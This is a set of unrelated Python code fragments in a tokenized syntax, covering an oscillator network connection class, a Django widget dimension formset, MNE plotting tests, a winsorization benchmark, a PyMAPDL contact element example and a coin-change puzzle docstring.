column), this value is zero in case of non-grid structure. @note This property returns valid value only for network with grid structure. """<line_sep><return>self.__height<block_end>@property<def_stmt>width self<block_start>"""! @brief Width of the network grid, this value is zero in case of non-grid structure. @note This property returns valid value only for network with grid structure. """<line_sep><return>self.__width<block_end>@property<def_stmt>structure self<block_start>"""! @brief Type of network structure that is used for connecting oscillators. """<line_sep><return>self.__conn_type<block_end><def_stmt>__init__ self num_osc type_conn=conn_type.ALL_TO_ALL conn_repr=conn_represent.MATRIX height=<none> width=<none><block_start>"""! @brief Constructor of the network. @param[in] num_osc (uint): Number of oscillators in the network that defines size of the network. @param[in] type_conn (conn_type): Type of connections that are used in the network between oscillators. 
@param[in] conn_repr (conn_represent): Type of representation of connections. @param[in] height (uint): Number of oscillators in column of the network, this argument is used only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored. @param[in] width (uint): Number of oscillotors in row of the network, this argument is used only for network with grid structure (GRID_FOUR, GRID_EIGHT), for other types this argument is ignored. """<line_sep>self._num_osc=num_osc<line_sep>self._conn_represent=conn_repr<line_sep>self.__conn_type=type_conn<if_stmt>conn_repr<is><none><block_start>self._conn_represent=conn_represent.MATRIX<block_end><if_stmt>(type_conn<eq>conn_type.GRID_EIGHT)<or>(type_conn<eq>conn_type.GRID_FOUR)<block_start><if_stmt>(height<is><not><none>)<and>(width<is><not><none>)<block_start>self.__height=height<line_sep>self.__width=width<block_end><else_stmt><block_start>side_size=self._num_osc<power>0.5<if_stmt>(side_size-math.floor(side_size)<g>0)<block_start><raise>NameError("Invalid number of oscillators '"+str(num_osc)+"' in the network in case of grid structure (root square should be extractable for the number of oscillators).")<line_sep><block_end>self.__height=int(side_size)<line_sep>self.__width=self.__height<block_end><if_stmt>self.__height<times>self.__width<ne>self._num_osc<block_start><raise>NameError('Width ('+str(self.__width)+') x Height ('+str(self.__height)+') must be equal to Size ('+str(self._num_osc)+') in case of grid structure')<line_sep><block_end><block_end>self._create_structure(type_conn)<block_end><def_stmt>__len__ self<block_start>"""! @brief Returns size of the network that is defined by amount of oscillators. """<line_sep><return>self._num_osc<line_sep><block_end><def_stmt>__create_connection self index1 index2<block_start><if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start>self._osc_conn[index1][index2]=<true><block_end><else_stmt><block_start>self._osc_conn[index1].append(index2)<line_sep><block_end><block_end><def_stmt>__create_all_to_all_connections self<block_start>"""! @brief Creates connections between all oscillators. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>index range(0 self._num_osc 1)<block_start>self._osc_conn.append([<true>]<times>self._num_osc)<line_sep>self._osc_conn[index][index]=<false><block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><for_stmt>index range(0 self._num_osc 1)<block_start>self._osc_conn.append([neigh<for>neigh range(0 self._num_osc 1)<if>index<ne>neigh])<line_sep><block_end><block_end><block_end><def_stmt>__create_grid_four_connections self<block_start>"""! @brief Creates network with connections that make up four grid structure. @details Each oscillator may be connected with four neighbors in line with 'grid' structure: right, upper, left, lower. 
"""<line_sep>side_size=self.__width<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start>self._osc_conn=[[0]<times>self._num_osc<for>index range(0 self._num_osc 1)]<block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start>self._osc_conn=[[]<for>index range(0 self._num_osc 1)]<block_end><else_stmt><block_start><raise>NameError("Unknown type of representation of connections")<line_sep><block_end><for_stmt>index range(0 self._num_osc 1)<block_start>upper_index=index-side_size<line_sep>lower_index=index+side_size<line_sep>left_index=index-1<line_sep>right_index=index+1<line_sep>node_row_index=math.ceil(index/side_size)<if_stmt>(upper_index<ge>0)<block_start>self.__create_connection(index upper_index)<line_sep><block_end><if_stmt>(lower_index<l>self._num_osc)<block_start>self.__create_connection(index lower_index)<line_sep><block_end><if_stmt>((left_index<ge>0)<and>(math.ceil(left_index/side_size)<eq>node_row_index))<block_start>self.__create_connection(index left_index)<line_sep><block_end><if_stmt>((right_index<l>self._num_osc)<and>(math.ceil(right_index/side_size)<eq>node_row_index))<block_start>self.__create_connection(index right_index)<line_sep><block_end><block_end><block_end><def_stmt>__create_grid_eight_connections self<block_start>"""! @brief Creates network with connections that make up eight grid structure. @details Each oscillator may be connected with eight neighbors in line with grid structure: right, right-upper, upper, upper-left, left, left-lower, lower, lower-right. """<line_sep>self.__create_grid_four_connections()<line_sep># create connection with right, upper, left, lower. side_size=self.__width<for_stmt>index range(0 self._num_osc 1)<block_start>upper_left_index=index-side_size-1<line_sep>upper_right_index=index-side_size+1<line_sep>lower_left_index=index+side_size-1<line_sep>lower_right_index=index+side_size+1<line_sep>node_row_index=math.floor(index/side_size)<line_sep>upper_row_index=node_row_index-1<line_sep>lower_row_index=node_row_index+1<if_stmt>((upper_left_index<ge>0)<and>(math.floor(upper_left_index/side_size)<eq>upper_row_index))<block_start>self.__create_connection(index upper_left_index)<line_sep><block_end><if_stmt>((upper_right_index<ge>0)<and>(math.floor(upper_right_index/side_size)<eq>upper_row_index))<block_start>self.__create_connection(index upper_right_index)<line_sep><block_end><if_stmt>((lower_left_index<l>self._num_osc)<and>(math.floor(lower_left_index/side_size)<eq>lower_row_index))<block_start>self.__create_connection(index lower_left_index)<line_sep><block_end><if_stmt>((lower_right_index<l>self._num_osc)<and>(math.floor(lower_right_index/side_size)<eq>lower_row_index))<block_start>self.__create_connection(index lower_right_index)<line_sep><block_end><block_end><block_end><def_stmt>__create_list_bidir_connections self<block_start>"""! @brief Creates network as bidirectional list. @details Each oscillator may be conneted with two neighbors in line with classical list structure: right, left. 
"""<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>index range(0 self._num_osc 1)<block_start>self._osc_conn.append([0]<times>self._num_osc)<line_sep>self._osc_conn[index][index]=<false><if_stmt>(index<g>0)<block_start>self._osc_conn[index][index-1]=<true><line_sep><block_end><if_stmt>(index<l>(self._num_osc-1))<block_start>self._osc_conn[index][index+1]=<true><block_end><block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><for_stmt>index range(self._num_osc)<block_start>self._osc_conn.append([])<if_stmt>(index<g>0)<block_start>self._osc_conn[index].append(index-1)<line_sep><block_end><if_stmt>(index<l>(self._num_osc-1))<block_start>self._osc_conn[index].append(index+1)<line_sep><block_end><block_end><block_end><block_end><def_stmt>__create_none_connections self<block_start>"""! @brief Creates network without connections. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>_ range(0 self._num_osc 1)<block_start>self._osc_conn.append([<false>]<times>self._num_osc)<block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start>self._osc_conn=[[]<for>_ range(0 self._num_osc 1)]<line_sep><block_end><block_end><def_stmt>__create_dynamic_connection self<block_start>"""! @brief Prepare storage for dynamic connections. """<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><for_stmt>_ range(0 self._num_osc 1)<block_start>self._osc_conn.append([<false>]<times>self._num_osc)<block_end><block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start>self._osc_conn=[[]<for>_ range(0 self._num_osc 1)]<line_sep><block_end><block_end><def_stmt>_create_structure self type_conn=conn_type.ALL_TO_ALL<block_start>"""! @brief Creates connection in line with representation of matrix connections [NunOsc x NumOsc]. @param[in] type_conn (conn_type): Connection type (all-to-all, bidirectional list, grid structure, etc.) that is used by the network. """<line_sep>self._osc_conn=list()<if_stmt>(type_conn<eq>conn_type.NONE)<block_start>self.__create_none_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.ALL_TO_ALL)<block_start>self.__create_all_to_all_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.GRID_FOUR)<block_start>self.__create_grid_four_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.GRID_EIGHT)<block_start>self.__create_grid_eight_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.LIST_BIDIR)<block_start>self.__create_list_bidir_connections()<block_end><elif_stmt>(type_conn<eq>conn_type.DYNAMIC)<block_start>self.__create_dynamic_connection()<block_end><else_stmt><block_start><raise>NameError('The unknown type of connections')<line_sep><block_end><block_end><def_stmt>has_connection self i j<block_start>"""! @brief Returns True if there is connection between i and j oscillators and False - if connection doesn't exist. @param[in] i (uint): index of an oscillator in the network. @param[in] j (uint): index of an oscillator in the network. 
"""<if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><return>(self._osc_conn[i][j])<block_end><elif_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><for_stmt>neigh_index range(0 len(self._osc_conn[i]) 1)<block_start><if_stmt>(self._osc_conn[i][neigh_index]<eq>j)<block_start><return><true><line_sep><block_end><block_end><return><false><block_end><else_stmt><block_start><raise>NameError("Unknown type of representation of coupling")<line_sep><block_end><block_end><def_stmt>set_connection self i j<block_start>"""! @brief Couples two specified oscillators in the network with dynamic connections. @param[in] i (uint): index of an oscillator that should be coupled with oscillator 'j' in the network. @param[in] j (uint): index of an oscillator that should be coupled with oscillator 'i' in the network. @note This method can be used only in case of DYNAMIC connections, otherwise it throws expection. """<if_stmt>(self.structure<ne>conn_type.DYNAMIC)<block_start><raise>NameError("Connection between oscillators can be changed only in case of dynamic type.")<line_sep><block_end><if_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start>self._osc_conn[i][j]=<true><line_sep>self._osc_conn[j][i]=<true><block_end><else_stmt><block_start>self._osc_conn[i].append(j)<line_sep>self._osc_conn[j].append(i)<line_sep><block_end><block_end><def_stmt>get_neighbors self index<block_start>"""! @brief Finds neighbors of the oscillator with specified index. @param[in] index (uint): index of oscillator for which neighbors should be found in the network. @return (list) Indexes of neighbors of the specified oscillator. """<if_stmt>(self._conn_represent<eq>conn_represent.LIST)<block_start><return>self._osc_conn[index]<line_sep># connections are represented by list. <block_end><elif_stmt>(self._conn_represent<eq>conn_represent.MATRIX)<block_start><return>[neigh_index<for>neigh_index range(self._num_osc)<if>self._osc_conn[index][neigh_index]<eq><true>]<block_end><else_stmt><block_start><raise>NameError("Unknown type of representation of connections")<line_sep><block_end><block_end><block_end>
<import_stmt>floppyforms<as>forms<import_from_stmt>django.forms.models modelformset_factory<import_from_stmt>django.utils.translation ugettext_lazy<as>_<import_from_stmt>horizon tables<import_from_stmt>horizon.tables.formset FormsetDataTable FormsetRow<import_from_stmt>leonardo.module.web.models WidgetDimension<class_stmt>Slider(forms.RangeInput)<block_start>min=1<line_sep>max=12<line_sep>step=1<line_sep>template_name='floppyforms/slider.html'<block_end><class_stmt>OffsetSlider(Slider)<block_start>min=0<block_end><class_stmt>HeightSlider(OffsetSlider)<block_start>max=24<block_end><class_stmt>WidgetDimensionForm(forms.ModelForm)<block_start>width=forms.CharField(widget=Slider() initial=12)<line_sep>height=forms.CharField(widget=HeightSlider() initial=0)<line_sep>offset=forms.CharField(widget=OffsetSlider() initial=0)<def_stmt>__init__ self *args **kw<block_start>super(WidgetDimensionForm self).__init__(*args **kw)<line_sep>self.fields['size'].initial='xs'<block_end><class_stmt>Meta<block_start>model=WidgetDimension<line_sep>exclude=tuple()<block_end><block_end>WidgetDimensionFormset=modelformset_factory(WidgetDimension form=WidgetDimensionForm can_delete=<true> extra=1)<class_stmt>CustomFormsetRow(FormsetRow)<block_start><def_stmt>__init__ self column datum form<block_start>self.form=form<line_sep>super(CustomFormsetRow self).__init__(column datum form)<line_sep># add initial <if_stmt><not>datum<and>column.data<block_start><try_stmt><block_start>previous=column.data[0]<line_sep>self.form.fields['widget_type'].initial=previous.widget_type<line_sep>self.form.fields['widget_id'].initial=previous.widget_id<line_sep>self.form.fields['id'].initial=previous.id+1<block_end><except_stmt>Exception<block_start><pass><block_end><block_end><block_end><block_end><class_stmt>WidgetDimensionTable(FormsetDataTable)<block_start>formset_class=WidgetDimensionFormset<def_stmt>get_formset self<block_start>"""Provide the formset corresponding to this DataTable. Use this to validate the formset and to get the submitted data back. """<if_stmt>self.widget<block_start>queryset=self.widget.dimensions<block_end><else_stmt><block_start>queryset=WidgetDimension.objects.none()<block_end><if_stmt>self._formset<is><none><block_start>self._formset=self.formset_class(self.request.POST<or><none> initial=self._get_formset_data() prefix=self._meta.name queryset=queryset)<block_end><return>self._formset<block_end><def_stmt>__init__ self *args **kwargs<block_start>self._meta.row_class=CustomFormsetRow<line_sep>self.widget=kwargs.pop('widget' <none>)<line_sep>super(WidgetDimensionTable self).__init__(*args **kwargs)<block_end>widget_id=tables.Column('widget_id' hidden=<true>)<line_sep>widget_type=tables.Column('widget_type' hidden=<true>)<line_sep>size=tables.Column('size' verbose_name=_('Size'))<line_sep>width=tables.Column('width' verbose_name=('Width'))<line_sep>height=tables.Column('height' verbose_name=_('Height'))<line_sep>offset=tables.Column('offset' verbose_name=_('Offset'))<line_sep>name='dimensions'<class_stmt>Meta<block_start>name='dimensions'<line_sep>table_name='Dimensions'<block_end><block_end>
# Authors: <NAME> <<EMAIL>> # # License: Simplified BSD <import_stmt>pytest<import_from_stmt>mne.viz._mpl_figure _psd_figure<import_from_stmt>mne.viz._figure _get_browser<def_stmt>test_browse_figure_constructor <block_start>"""Test error handling in MNEBrowseFigure constructor."""<with_stmt>pytest.raises(TypeError match='an instance of Raw, Epochs, or ICA')<block_start>_get_browser(inst='foo')<block_end><block_end><def_stmt>test_psd_figure_constructor <block_start>"""Test error handling in MNELineFigure constructor."""<with_stmt>pytest.raises(TypeError match='an instance of Raw or Epochs, got')<block_start>_psd_figure('foo' *((<none> )<times>20))<block_end><block_end>
# -*- coding: utf-8 -*- """ Created on 2017-4-25 @author: cheng.li """<import_stmt>datetime<as>dt<import_stmt>numpy<as>np<import_stmt>pandas<as>pd<import_from_stmt>alphamind.data.winsorize winsorize_normal<def_stmt>benchmark_winsorize_normal n_samples:int n_features:int n_loops:int<arrow><none><block_start>print("-"<times>60)<line_sep>print("Starting winsorize normal benchmarking")<line_sep>print("Parameters(n_samples: {0}, n_features: {1}, n_loops: {2})".format(n_samples n_features n_loops))<line_sep>num_stds=2<line_sep>x=np.random.randn(n_samples n_features)<line_sep>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=winsorize_normal(x num_stds)<block_end>impl_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Implemented model' impl_model_time))<def_stmt>impl x<block_start>std_values=x.std(axis=0)<line_sep>mean_value=x.mean(axis=0)<line_sep>lower_bound=mean_value-num_stds<times>std_values<line_sep>upper_bound=mean_value+num_stds<times>std_values<line_sep>res=np.where(x<g>upper_bound upper_bound x)<line_sep>res=np.where(res<l>lower_bound lower_bound res)<line_sep><return>res<block_end>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=impl(x)<block_end>benchmark_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Benchmark model' benchmark_model_time))<block_end><def_stmt>benchmark_winsorize_normal_with_group n_samples:int n_features:int n_loops:int n_groups:int<arrow><none><block_start>print("-"<times>60)<line_sep>print("Starting winsorize normal with group-by values benchmarking")<line_sep>print("Parameters(n_samples: {0}, n_features: {1}, n_loops: {2}, n_groups: {3})".format(n_samples n_features n_loops n_groups))<line_sep>num_stds=2<line_sep>x=np.random.randn(n_samples n_features)<line_sep>groups=np.random.randint(n_groups size=n_samples)<line_sep>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=winsorize_normal(x num_stds groups=groups)<block_end>impl_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Implemented model' impl_model_time))<def_stmt>impl x<block_start>std_values=x.std(axis=0)<line_sep>mean_value=x.mean(axis=0)<line_sep>lower_bound=mean_value-num_stds<times>std_values<line_sep>upper_bound=mean_value+num_stds<times>std_values<line_sep>res=np.where(x<g>upper_bound upper_bound x)<line_sep>res=np.where(res<l>lower_bound lower_bound res)<line_sep><return>res<block_end>start=dt.datetime.now()<for_stmt>_ range(n_loops)<block_start>_=pd.DataFrame(x).groupby(groups).transform(impl)<block_end>benchmark_model_time=dt.datetime.now()-start<line_sep>print('{0:20s}: {1}'.format('Benchmark model' benchmark_model_time))<block_end><if_stmt>__name__<eq>'__main__'<block_start>benchmark_winsorize_normal(3000 10 1000)<line_sep>benchmark_winsorize_normal_with_group(3000 10 1000 30)<block_end>
""" .. _ref_contact_example: Contact Element Example ~~~~~~~~~~~~~~~~~~~~~~~ This example demonstrates how to create contact elements for general contact. Begin by launching MAPDL. """<import_from_stmt>ansys.mapdl core<as>pymapdl<line_sep>mapdl=pymapdl.launch_mapdl()<line_sep>############################################################################### # Enter the pre-processor, create a block and mesh it with tetrahedral # elements. # mapdl.prep7()<line_sep>vnum0=mapdl.block(0 1 0 1 0 0.5)<line_sep>mapdl.et(1 187)<line_sep>mapdl.esize(0.1)<line_sep>mapdl.vmesh(vnum0)<line_sep>mapdl.eplot()<line_sep>############################################################################### # Second a volume block above the existing block and mesh it with # quadratic hexahedral elements. Ensure that these blocks do not # touch by starting it slightly higher than the existing block. # # Note how these two blocks do not touch and the mesh is non-conformal. mapdl.esize(0.09)<line_sep>mapdl.et(2 186)<line_sep>mapdl.type(2)<line_sep>vnum1=mapdl.block(0 1 0 1 0.50001 1)<line_sep>mapdl.vmesh(vnum1)<line_sep>mapdl.eplot()<line_sep>############################################################################### # Select all the elements at the intersection between the two blocks # and generate contact elements. mapdl.nsel("s" "loc" "z" 0.5 0.50001)<line_sep>mapdl.esln("s")<line_sep>output=mapdl.gcgen("NEW" splitkey="SPLIT" selopt="SELECT")<line_sep>print(output)<line_sep>############################################################################### # Plot the contact element pairs. Note from the command output above # that the section IDs are 5 and 6. # # Here, we plot the element mesh as a wire-frame to show that the # contact pairs overlap. mapdl.esel("S" "SEC" vmin=5 vmax=6)<line_sep>mapdl.eplot(style="wireframe" line_width=3)<line_sep>
"""This problem was asked by Snapchat. You are given an array of length N, where each element i represents the number of ways we can produce i units of change. For example, [1, 0, 1, 1, 2] would indicate that there is only one way to make 0, 2, or 3 units, and two ways of making 4 units. Given such an array, determine the denominations that must be in use. In the case above, for example, there must be coins with value 2, 3, and 4. """<line_sep>